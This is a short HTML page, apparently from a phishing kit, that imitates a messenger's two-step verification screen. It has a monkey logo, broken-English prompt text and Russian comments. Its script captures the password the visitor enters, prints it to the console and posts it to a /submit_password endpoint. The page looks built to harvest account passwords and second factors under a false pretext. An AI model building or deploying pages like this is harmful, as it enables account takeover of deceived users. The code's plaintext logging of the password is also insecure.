<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Password</title>
    <style>
        .password-container {
            text-align: center;
            padding: 20px;
        }
        .password-container img {
            max-width: 100px; /* Размер изображения можно настроить */
            margin-bottom: 20px;
        }
    </style>
    <link rel="stylesheet" href="/static/css/styles.css">
</head>
<body>
    <div class="password-container">
        <img src="/static/img/monkey_pass.png" alt="Monkey Logo">
        <h1>Enter your password</h1>
        <p>Can you two-step verification enabled so your account is protected with an additional password.</p>
        <form id="password-form" class="password-form">
            <div class="password-input">
                <label for="password">Password:</label>
                <input type="password" id="password" name="password" placeholder="Enter your password" required>
            </div>
            <button type="submit">Submit</button>
        </form>
    </div>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            console.log('DOM fully loaded and parsed');
            document.getElementById('password-form').addEventListener('submit', function(event) {
                event.preventDefault(); // Предотвращаем стандартное поведение формы
                var password = document.getElementById('password').value;
                console.log('Password entered: ' + password);
                fetch('/submit_password', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ password: password })
                })
                .then(response => response.json())
                .then(data => console.log(data))
                .catch(error => console.error('Error:', error));
            });
        });
    </script>
</body>
</html>
